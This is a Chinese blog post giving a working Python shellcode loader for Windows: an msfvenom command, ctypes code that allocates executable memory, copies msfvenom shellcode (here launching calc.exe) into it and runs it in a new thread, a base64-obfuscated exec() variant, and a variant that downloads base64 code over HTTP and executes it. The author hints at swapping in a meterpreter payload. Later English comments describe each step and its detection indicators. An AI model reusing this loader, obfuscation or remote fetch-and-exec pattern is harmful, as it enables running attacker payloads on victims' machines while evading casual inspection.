python exec shellcode

  1. 前言
  2. 正文

前言

这里我先吐槽一下,网上用中文搜的python执行shellcode。全部是复制粘贴,棒得我不知道如何下手
然后今天早上@即刻安全-Yansu老哥帮我整出来了。老板喝茶
15.jpg

正文

代码我理解不了多少,可能还有错的
获取shellcode

msfvenom -p windows/x64/exec CMD=calc.exe -f py -o /root/demo.py 

执行shellcode代码如下

# Minimal ctypes shellcode loader. Windows x64 only: the bytes in `buf` come from
# `msfvenom -p windows/x64/exec` (see the command above). Flow: allocate an RWX region
# with VirtualAlloc, copy `buf` into it with RtlMoveMemory, start a thread at the
# region's base address with CreateThread, then block until that thread exits.
# From a defender's point of view every step is a textbook in-memory-execution
# indicator: a PAGE_EXECUTE_READWRITE allocation, a copy into it, and a thread whose
# start address is not backed by any loaded module — all from a python.exe process.
# `import sys` and `from ctypes import *` are unused; everything goes through `ctypes.`.
import ctypes
import sys
from ctypes import *
# Raw payload as emitted by msfvenom -f py. The trailing bytes spell "calc.exe\0",
# the command string the payload hands to its exec routine.
buf =  b""
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
buf += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
buf += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
buf += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
buf += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
buf += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"
buf += b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"
buf += b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"
buf += b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
buf += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
buf += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
buf += b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
buf += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
buf += b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"
buf += b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"
buf += b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41"
buf += b"\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
buf += b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
buf += b"\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x2e\x65"
buf += b"\x78\x65\x00"

# Per Microsoft's documentation these two make the region readable, writable AND
# executable: PAGE_EXECUTE_READWRITE (protection) and VIRTUAL_MEM (allocation type).
# RWX pages are exactly what memory scanners look for — a legitimate program almost
# never needs a page that is writable and executable at the same time.
PAGE_EXECUTE_READWRITE  =  0x00000040 # page protection: execute + read + write
VIRTUAL_MEM  =  ( 0x1000 | 0x2000 ) # MEM_COMMIT | MEM_RESERVE
buf_arr = bytearray (buf) # mutable copy of the shellcode (from_buffer below needs a writable buffer)
buf_size = len(buf_arr) # shellcode length in bytes
kernel32 = ctypes.cdll.LoadLibrary("kernel32.dll") # load kernel32.dll; all Win32 calls below go through it
kernel32.VirtualAlloc.restype = ctypes.c_uint64 # return type is c_uint64: the ctypes default (c_int) would truncate a 64-bit address
sc_ptr = kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(buf_size), VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) # reserve+commit buf_size bytes of RWX memory at an address of the OS's choosing; returns the base address
buf_ptr = (ctypes.c_char * buf_size).from_buffer(buf_arr) # ctypes char array that shares buf_arr's memory (no copy)
# Debug output only: the allocation address and the ctypes array object.
print(sc_ptr)
print(buf_ptr)
kernel32.RtlMoveMemory(ctypes.c_uint64(sc_ptr),buf_ptr,ctypes.c_int(buf_size)) # copy the shellcode into the RWX region; sc_ptr is re-wrapped as c_uint64 because no argtypes are declared

# CreateThread(lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter,
#              dwCreationFlags, lpThreadId). restype is left at the ctypes default
# (c_int), so the returned HANDLE arrives as a 32-bit int and is passed back as one.
handle = kernel32.CreateThread(ctypes.c_int(0),               # lpThreadAttributes: NULL
                               ctypes.c_int(0),               # dwStackSize: 0 -> default stack
                               ctypes.c_uint64(sc_ptr),       # lpStartAddress: base of the RWX region, i.e. the shellcode itself
                               ctypes.c_int(0),               # lpParameter: NULL
                               ctypes.c_int(0),               # dwCreationFlags: 0 -> thread starts immediately
                               ctypes.pointer(ctypes.c_int(0))) # lpThreadId: receives the new thread's id (value never read)
kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1)) # -1 == INFINITE: block the interpreter until the shellcode thread exits

注意:

这里的shellcode是弹计算器的

kGMR8x.md.png

如果你觉得长得离谱,那么你可以这样执行

# The loader script above, carried as one base64 string and handed to exec().
# (The text says so, and the prefix decodes to "import ctypes".) Encoding the source
# changes nothing about what runs; it only hides it from a casual read, and a
# `exec(base64.b64decode(...))` one-liner is itself a pattern detection rules key on.
# NOTE(review): in this copy the literal is wrapped across two lines; in a runnable
# file it is a single line.
import base64
payload=B"aW1wb3J0IGN0eXBlcw0KaW1wb3J0IHN5cw0KZnJvbSBjdHlwZXMgaW1wb3J0ICoNCmJ1ZiA9ICBiIiINCmJ1ZiArPSBiIlx4ZmNceDQ4XHg4M1x4ZTRceGYwXHhlOFx4YzBceDAwXHgwMFx4MDBceDQxXHg1MVx4NDEiDQpidWYgKz0gYiJceDUwXHg1Mlx4NTFceDU2XHg0OFx4MzFceGQyXHg2NVx4NDhceDhiXHg1Mlx4NjBceDQ4Ig0KYnVmICs9IGIiXHg4Ylx4NTJceDE4XHg0OFx4OGJceDUyXHgyMFx4NDhceDhiXHg3Mlx4NTBceDQ4XHgwZiINCmJ1ZiArPSBiIlx4YjdceDRhXHg0YVx4NGRceDMxXHhjOVx4NDhceDMxXHhjMFx4YWNceDNjXHg2MVx4N2MiDQpidWYgKz0gYiJceDAyXHgyY1x4MjBceDQxXHhjMVx4YzlceDBkXHg0MVx4MDFceGMxXHhlMlx4ZWRceDUyIg0KYnVmICs9IGIiXHg0MVx4NTFceDQ4XHg4Ylx4NTJceDIwXHg4Ylx4NDJceDNjXHg0OFx4MDFceGQwXHg4YiINCmJ1ZiArPSBiIlx4ODBceDg4XHgwMFx4MDBceDAwXHg0OFx4ODVceGMwXHg3NFx4NjdceDQ4XHgwMVx4ZDAiDQpidWYgKz0gYiJceDUwXHg4Ylx4NDhceDE4XHg0NFx4OGJceDQwXHgyMFx4NDlceDAxXHhkMFx4ZTNceDU2Ig0KYnVmICs9IGIiXHg0OFx4ZmZceGM5XHg0MVx4OGJceDM0XHg4OFx4NDhceDAxXHhkNlx4NGRceDMxXHhjOSINCmJ1ZiArPSBiIlx4NDhceDMxXHhjMFx4YWNceDQxXHhjMVx4YzlceDBkXHg0MVx4MDFceGMxXHgzOFx4ZTAiDQpidWYgKz0gYiJceDc1XHhmMVx4NGNceDAzXHg0Y1x4MjRceDA4XHg0NVx4MzlceGQxXHg3NVx4ZDhceDU4Ig0KYnVmICs9IGIiXHg0NFx4OGJceDQwXHgyNFx4NDlceDAxXHhkMFx4NjZceDQxXHg4Ylx4MGNceDQ4XHg0NCINCmJ1ZiArPSBiIlx4OGJceDQwXHgxY1x4NDlceDAxXHhkMFx4NDFceDhiXHgwNFx4ODhceDQ4XHgwMVx4ZDAiDQpidWYgKz0gYiJceDQxXHg1OFx4NDFceDU4XHg1ZVx4NTlceDVhXHg0MVx4NThceDQxXHg1OVx4NDFceDVhIg0KYnVmICs9IGIiXHg0OFx4ODNceGVjXHgyMFx4NDFceDUyXHhmZlx4ZTBceDU4XHg0MVx4NTlceDVhXHg0OCINCmJ1ZiArPSBiIlx4OGJceDEyXHhlOVx4NTdceGZmXHhmZlx4ZmZceDVkXHg0OFx4YmFceDAxXHgwMFx4MDAiDQpidWYgKz0gYiJceDAwXHgwMFx4MDBceDAwXHgwMFx4NDhceDhkXHg4ZFx4MDFceDAxXHgwMFx4MDBceDQxIg0KYnVmICs9IGIiXHhiYVx4MzFceDhiXHg2Zlx4ODdceGZmXHhkNVx4YmJceGYwXHhiNVx4YTJceDU2XHg0MSINCmJ1ZiArPSBiIlx4YmFceGE2XHg5NVx4YmRceDlkXHhmZlx4ZDVceDQ4XHg4M1x4YzRceDI4XHgzY1x4MDYiDQpidWYgKz0gYiJceDdjXHgwYVx4ODBceGZiXHhlMFx4NzVceDA1XHhiYlx4NDdceDEzXHg3Mlx4NmZceDZhIg0KYnVmICs9IGIiXHgwMFx4NTlceDQxXHg4OVx4ZGFceGZmXHhkNVx4NjNceDYxXHg2Y1x4NjNceDJlXHg2NSINCmJ1ZiArPSBiIlx4NzhceDY1XHgwMCINCg0KI+i/meS4pOS4quW+rui9r+WumOaWueivtOaYjuaYr+WPr+ivu+WPr+WGmeWPr+aJp+ihjO+8jFBBR0VfRV
hFQ1VURV9SRUFEV1JJVEXlkoxWSVJUVUFMX01FTQ0KUEFHRV9FWEVDVVRFX1JFQURXUklURSAgPSAgMHgwMDAwMDA0MCAj5Y+C5pWw6K6+5a6aDQpWSVJUVUFMX01FTSAgPSAgKCAweDEwMDAgfCAweDIwMDAgKSAj5Y+C5pWw6K6+5a6aDQpidWZfYXJyID0gYnl0ZWFycmF5IChidWYpICNzaGVsbGNvZGXlj5jkuLrkuIDkuKrmlrDnmoTlrZfoioLmlbDnu4QNCmJ1Zl9zaXplID0gbGVuKGJ1Zl9hcnIpICPorqHnrpdzaGVsbGNvZGXnmoTlpKflsI8NCmtlcm5lbDMyID0gY3R5cGVzLmNkbGwuTG9hZExpYnJhcnkoImtlcm5lbDMyLmRsbCIpICPosIPnlKhrZXJuZWwzMi5kbGwNCmtlcm5lbDMyLlZpcnR1YWxBbGxvYy5yZXN0eXBlID0gY3R5cGVzLmNfdWludDY0ICPov5Tlm57nsbvlnovkuLpjX3VpbnQ2NA0Kc2NfcHRyID0ga2VybmVsMzIuVmlydHVhbEFsbG9jKGN0eXBlcy5jX2ludCgwKSwgY3R5cGVzLmNfaW50KGJ1Zl9zaXplKSwgVklSVFVBTF9NRU0sIFBBR0VfRVhFQ1VURV9SRUFEV1JJVEUpICPorr7nva4NCmJ1Zl9wdHIgPSAoY3R5cGVzLmNfY2hhciAqIGJ1Zl9zaXplKS5mcm9tX2J1ZmZlcihidWZfYXJyKSAj5bCGc2hlbGxjb2Rl5oyH5ZCR5oyH6ZKIDQpwcmludChzY19wdHIpDQpwcmludChidWZfcHRyKQ0Ka2VybmVsMzIuUnRsTW92ZU1lbW9yeShjdHlwZXMuY191aW50NjQoc2NfcHRyKSxidWZfcHRyLGN0eXBlcy5jX2ludChidWZfc2l6ZSkpICPosIPnlKhkbGzvvIzmjIflkJFzaGVsbGNvZGUNCg0KaGFuZGxlID0ga2VybmVsMzIuQ3JlYXRlVGhyZWFkKGN0eXBlcy5jX2ludCgwKSwNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjdHlwZXMuY19pbnQoMCksDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY3R5cGVzLmNfdWludDY0KHNjX3B0ciksDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY3R5cGVzLmNfaW50KDApLA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGN0eXBlcy5jX2ludCgwKSwNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjdHlwZXMucG9pbnRlcihjdHlwZXMuY19pbnQoMCkpKQ0Ka2VybmVsMzIuV2FpdEZvclNpbmdsZU9iamVjdChjdHlwZXMuY19pbnQoaGFuZGxlKSxjdHlwZXMuY19pbnQoLTEpKQ=="
exec(base64.b64decode(payload)) # decodes the blob and runs it in the current process

再或者说,你可以选择远程读取并执行

# Fetches a base64 text over plaintext HTTP and exec()s whatever comes back.
# Nothing here authenticates the server or checks the response (no TLS, no
# signature, no hash): whoever controls the host behind `url`, or can tamper with
# the network path, decides what code runs in this process. `requests` is a
# third-party package, not part of the standard library.
import base64
import requests
url='http://127.0.0.1/wc.txt' # presumably the base64 blob from the previous section, served from localhost here
rqt=requests.get(url=url) # no timeout= is given, so this blocks for as long as the server keeps the connection open
exec(base64.b64decode(rqt.text)) # arbitrary code execution on the response body

如果想获取到meterpreter的话相信诸位都懂的,手动滑稽

最后还是谢谢Yansu老哥
转载请声明:转自422926799.github.io



文章标题:python exec shellcode

本文作者:九世

发布时间:2019-02-03, 13:12:57

最后更新:2019-04-19, 20:36:16

原始链接:http://jiushill.github.io/posts/a3f2d98a.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。
